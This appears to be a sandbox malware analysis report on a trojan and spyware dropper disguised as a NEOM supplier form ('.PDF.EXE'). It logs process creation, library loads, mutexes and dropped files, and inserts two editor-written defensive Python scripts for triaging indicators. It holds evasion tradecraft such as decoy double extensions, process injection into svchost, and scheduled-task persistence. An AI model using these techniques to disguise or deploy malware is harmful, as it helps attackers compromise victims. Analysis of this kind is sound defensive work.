Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@34/105@105/81
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Users\user\AppData\Roaming\52b8592e4ce608d8.bin
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-52b8592e4ce608d8-inf
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-52b8592e4ce608d8fc030088-b
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Mutant created: \BaseNamedObjects\Global\Microsoft.Windows.Remediation.TelemetryUpdateHealthTools
Source: C:\Windows\System32\alg.exe Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-52b8592e4ce608d89ea72c54-b
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Users\user\AppData\Local\Temp\aut72FF.tmp
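Added example (editor's code, not part of the Joe Sandbox report and not code from the sample): the File created and Mutant created lines above share one 16-hex-digit string, 52b8592e4ce608d8. It names the .bin the sample drops under the user's AppData\Roaming, the .bin that alg.exe writes under the SYSTEM profile's AppData\Roaming, and the Global\Multiarch.m0yv-... mutexes of both alg.exe and the sample. The script parses a copy of those lines and reports every identifier that more than one process creates, singling out creators that run from under C:\Windows: a system service binary emitting the same marker as a user-land dropper is the observation that matters here. Assumptions, since the report does not explain the naming: the first 16 hex digits are the per-host identifier and the extra 8 digits in the -b mutexes are a per-instance suffix.

```python
import re
from collections import defaultdict

# "File created" and "Mutant created" lines copied from the System Summary section above.
REPORT_LINES = [
    r"Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\52b8592e4ce608d8.bin",
    r"Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Users\user\AppData\Roaming\52b8592e4ce608d8.bin",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Mutant created: NULL",
    r"Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN",
    r"Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-52b8592e4ce608d8-inf",
    r"Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-52b8592e4ce608d8fc030088-b",
    r"Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Mutant created: \BaseNamedObjects\Global\Microsoft.Windows.Remediation.TelemetryUpdateHealthTools",
    r"Source: C:\Windows\System32\alg.exe Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-52b8592e4ce608d89ea72c54-b",
]

EVENT_RE = re.compile(r"^Source: (?P<proc>.+?) (?P<kind>File created|Mutant created): (?P<obj>.+)$")
# A run of 16 or more lower-case hex digits bounded by non-hex characters. Assumption: the first
# 16 digits are the identifier; the 8 extra digits seen in the '-b' mutexes are a per-instance suffix.
HEX_RUN_RE = re.compile(r"(?<![0-9a-fA-F])[0-9a-f]{16,}(?![0-9a-fA-F])")
MARKER_LEN = 16


def parse_events(lines):
    """(process, kind, object name) for every File created / Mutant created line."""
    out = []
    for line in lines:
        m = EVENT_RE.match(line)
        if m:
            out.append((m["proc"], m["kind"], m["obj"]))
    return out


def markers(lines):
    """identifier -> {'processes': creators, 'objects': [(kind, name), ...]}."""
    table = defaultdict(lambda: {"processes": set(), "objects": []})
    for proc, kind, obj in parse_events(lines):
        for run in HEX_RUN_RE.findall(obj):
            entry = table[run[:MARKER_LEN]]
            entry["processes"].add(proc)
            entry["objects"].append((kind, obj))
    return dict(table)


def cross_process_markers(lines, min_processes=2):
    """Identifiers that appear in artifacts created by at least `min_processes` distinct processes."""
    return {k: v for k, v in markers(lines).items() if len(v["processes"]) >= min_processes}


def system_binaries_sharing(lines):
    """Creators under C:\\Windows that emitted a shared identifier (service binaries running the dropper's code)."""
    hits = set()
    for entry in cross_process_markers(lines).values():
        hits.update(p for p in entry["processes"] if p.lower().startswith("c:\\windows\\"))
    return hits


def global_mutexes(lines):
    """Mutant names in the Global\\ namespace (session-wide, so usable as host IOCs)."""
    return sorted(obj.rsplit("\\", 1)[-1] for _, kind, obj in parse_events(lines)
                  if kind == "Mutant created" and "\\Global\\" in obj)
```

Run against the full report the same way: paste every File created and Mutant created line into REPORT_LINES; any identifier with a creator under C:\Windows is a system binary to pull and compare against its signed original.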
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Virustotal: Detection: 71%
Source: unknown Process created: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: unknown Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: unknown Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: unknown Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: unknown Process created: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe "C:\Program Files\Microsoft Update Health Tools\uhssvc.exe"
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8F22.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8F22.tmp.cmd""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
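Added example (editor's code, not the report's own and not code from the sample): the Process created lines above are flat and most appear twice, which hides the chain. The script rebuilds the tree from a copy of those lines and applies four triage rules: an image whose command line names a different executable (the SysWOW64\svchost.exe instances launched with the sample's own path as their command line, consistent with the "Maps a DLL or memory area into another process" and "Writes to foreign memory regions" signatures), a decoy double extension, executables running from user-writable paths, and living-off-the-land binaries (powershell.exe, schtasks.exe, cmd.exe, timeout.exe) that have a user-writable ancestor. The LOLBin list, the path fragments and the decoy extensions are the editor's assumptions, not something the report defines.

```python
import ntpath
import re
from collections import defaultdict

# "Process created" lines copied from the System Summary section above (one copy of each).
REPORT_LINES = [
    r'Source: unknown Process created: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"',
    r'Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"',
    r'Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"',
    r'Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"',
    r'Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe',
    r'Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe',
    r'Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"',
    r'Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8F22.tmp.cmd""',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6',
    r'Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS',
]

EVENT_RE = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<image>.+?\.exe)(?: (?P<cmdline>.*))?$", re.I)
# Triage lists (editor's assumptions): living-off-the-land binaries, path fragments an unprivileged
# user can write to, and extensions used as the decoy half of a double-extension file name.
LOLBINS = {"powershell.exe", "schtasks.exe", "cmd.exe", "timeout.exe", "wscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = ("\\users\\", "\\programdata\\")
DECOY_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}

def parse_process_events(lines):
    """One dict per 'Source: <parent> Process created: <image> [<command line>]' line."""
    events = []
    for line in lines:
        m = EVENT_RE.match(line)
        if m:
            events.append({"parent": m["parent"], "image": m["image"], "cmdline": m["cmdline"] or ""})
    return events

def stem(path):
    """Lower-cased file name minus a trailing .exe; ntpath handles backslash paths on any host."""
    name = ntpath.basename(path).lower()
    return name[:-4] if name.endswith(".exe") else name

def command_line_image(cmdline):
    """Executable a command line names: its quoted first argument, the text up to the first .exe, or the first word."""
    if not cmdline:
        return None
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    m = re.match(r"(.+?\.exe)(?:\s|$)", cmdline, re.I)
    return m.group(1) if m else cmdline.split()[0]

def is_user_writable(path):
    return any(fragment in path.lower() for fragment in USER_WRITABLE)

def findings(events):
    """Four triage rules over the events; returns one dict per hit (rule name plus the event)."""
    parent_of = {}
    for e in events:
        parent_of.setdefault(e["image"], e["parent"])  # first observed parent wins

    def has_user_writable_ancestor(image):
        seen = set()
        while image in parent_of and image not in seen:  # `seen` guards against a sample-spawns-itself loop
            seen.add(image)
            image = parent_of[image]
            if is_user_writable(image):
                return True
        return False

    hits = []
    for e in events:
        rules = []
        named = command_line_image(e["cmdline"])
        if named and stem(named) != stem(e["image"]):
            # Image and command line disagree: a process created from one binary, then filled with another's payload.
            rules.append("image_cmdline_mismatch")
        parts = ntpath.basename(e["image"]).lower().split(".")
        if len(parts) >= 3 and parts[-2] in DECOY_EXTENSIONS:
            rules.append("decoy_double_extension")
        if is_user_writable(e["image"]):
            rules.append("executable_in_user_writable_path")
        if ntpath.basename(e["image"]).lower() in LOLBINS and has_user_writable_ancestor(e["image"]):
            rules.append("lolbin_under_user_writable_ancestor")
        hits.extend({"rule": rule, **e} for rule in rules)
    return hits

def render_tree(events, root="unknown"):
    """Indented parent/child view that the report's flat 'Source: X Process created: Y' lines hide."""
    children = defaultdict(list)
    for e in events:
        children[e["parent"]].append(e)
    out = []

    def walk(parent, depth, seen):
        for e in children.get(parent, []):
            out.append("  " * depth + ntpath.basename(e["image"]) + (f'  [{e["cmdline"]}]' if e["cmdline"] else ""))
            if e["image"] not in seen:
                walk(e["image"], depth + 1, seen | {e["image"]})
    walk(root, 0, set())
    return "\n".join(out)
```

The mismatch rule compares file names only, so the SysWOW64\cmd.exe image launched with a C:\Windows\system32\cmd.exe command line (WoW64 redirection) is not flagged, while svchost.exe launched with the sample's path is. The same four rules map directly onto EDR process-creation telemetry (image path, command line, parent) outside the sandbox.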
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: version.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: winmm.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: mpr.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: wininet.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: userenv.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: secur32.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: wldp.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: sxs.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: webio.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\alg.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\alg.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\alg.exe Section loaded: mpr.dll
Source: C:\Windows\System32\alg.exe Section loaded: secur32.dll
Source: C:\Windows\System32\alg.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\alg.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\alg.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\alg.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\alg.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: appvpolicy.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: userenv.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: secur32.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: wininet.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: netutils.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: samcli.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: mpr.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe Section loaded: appmanagementconfiguration.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\alg.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\alg.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\alg.exe Section loaded: webio.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: mpr.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: secur32.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: version.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: winmm.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: mpr.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: wininet.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: userenv.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: secur32.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: wldp.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: sxs.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: ondemandconnroutehelper.dll
